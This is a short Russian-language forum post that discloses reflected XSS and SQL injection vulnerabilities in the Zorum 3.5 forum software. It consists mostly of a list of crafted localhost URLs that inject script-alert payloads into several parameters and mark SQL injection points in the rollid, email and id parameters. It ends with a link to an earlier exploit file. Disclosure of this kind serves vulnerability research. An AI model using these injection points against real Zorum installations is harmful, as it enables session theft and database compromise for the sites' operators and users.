|
XSS(passive) & SQL-inj в Zorum 3.5
Поставил, вот, на локалку, помучал и нашёл:
(если что-то уже есть в паблике - извиняйте, я не проверял...) _http://localhost/zorum/index.php?method=userfunctions&list=<script>alert( "lol");</script> _http://localhost/zorum/index.php?method=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=showdetails&list=<script>alert("l ol");</script> _http://localhost/zorum/index.php?method=showhtmllist&list=topic&rollid=[_S_Q_L__H_E_R_E_] _http://localhost/zorum/index.php?method=create_form&list=<script>alert("l ol");</script> _http://localhost/zorum/index.php?inf=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=login_form&list=<script>alert("lo l");</script> _http://localhost/zorum/index.php?method=markread&list=zorumuser&fromlist= secmenu&frommethod=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=remind_password_form&list=<script >alert("lol");</script> _http://localhost/zorum/index.php?method=remind_password&list=zorumuser&fr omlist=forum&frommethod=showhtmllist&email=[_S_Q_L__H_E_R_E_]&submit=Ok _http://localhost/zorum/index.php?method=showattach&id=14[_S_Q_L__H_E_R_E_] |
4) Вроде была такая бага... __http://rst.void.ru/download/r57zor.txt
|
| Время: 00:56 |